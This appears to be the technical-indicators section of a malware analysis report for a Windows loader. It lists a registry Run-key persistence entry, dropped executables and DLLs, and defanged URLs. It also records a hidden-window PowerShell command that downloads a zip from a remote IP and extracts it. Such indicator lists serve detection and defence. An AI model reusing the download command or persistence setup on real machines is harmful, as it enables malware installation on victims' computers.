Technical information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'FxVqyJFJy' = '%LOCALAPPDATA%FxVqyJFJy\FxVqyJFJy.exe'
- http://10#.#10.151.169/arquivoloader/arquivoskl.zip as c:\xvjmbkcjgfe\kiepaosp.zip
- %WINDIR%\syswow64\explorer.exe
- %APPDATA%\orçamento 2020
- C:\xvjmbkcjgfe\kiepaosp.zip
- C:\xvjmbkcjgfe\launcher.exe
- C:\xvjmbkcjgfe\msctfmonitor.dll
- C:\xvjmbkcjgfe\staticcache.dat
- %LOCALAPPDATA%fxvqyjfjy\fxvqyjfjy.exe
- %LOCALAPPDATA%fxvqyjfjy\msctfmonitor.dll
- %LOCALAPPDATA%fxvqyjfjy\staticcache.dat
- http://10#.#10.151.169/arquivoloader/arquivosKL.zip
- http://ip##pi.com/json/
- DNS ASK ip##pi.com
- 'C:\xvjmbkcjgfe\launcher.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' (New-Object Net.WebClient).DownloadFile('http://10#.#10.151.169/arquivoloader/arquivosKL.zip','C:\xvjmbkcjgfe\kiEPaOsP.zip');(new-object -com shell.application).namespace('C:\xvjmbkcjgfe').Copy...' (with a hidden window)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\csc.exe'
- '%WINDIR%\syswow64\explorer.exe'